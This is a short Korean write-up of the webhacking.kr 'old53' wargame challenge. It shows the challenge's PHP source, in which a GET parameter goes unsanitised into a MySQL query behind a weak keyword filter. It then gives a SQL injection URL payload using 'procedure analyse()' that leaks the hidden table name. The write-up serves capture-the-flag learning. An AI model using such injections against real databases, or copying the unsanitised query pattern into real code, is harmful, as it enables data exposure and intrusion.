webhacking.kr - old53

처음에 접속하면 소스코드 하나만 확인할 수 있습니다.

<?php
  include "../../config.php";
  if($_GET['view_source']) view_source();
?>
<html>
<head>
<title>Challenge 53</title>
</head>
<body>
<?php
  $db = dbconnect();
  include "./tablename.php";
  if($_GET['answer'] == $hidden_table) solve(53);
  if(preg_match("/select|by/i",$_GET['val'])) exit("no hack");
  $result = mysqli_fetch_array(mysqli_query($db,"select a from $hidden_table where a={$_GET['val']}"));
  echo($result[0]);
?>
<hr><a href=./?view_source=1>view-source</a>
</body>
</html>

 

소스코드를 보면 숨겨져있는 테이블명이 하나 있는것 같은데 이것을 알아내기 위해서

 

> procedure analyse(); 함수를 활용하면 됩니다.

 

val 인자에 쿼리를 1  procedure analyse(); 를 넣어주면 됩니다.

 

?val=1%20%20procedure%20analyse();

 

위와 같이 쿼리를 넣어주면

 

 

테이블 명을 뱉고, 테이블 명을 answer 인자에 넣어주면 풀 수 있습니다.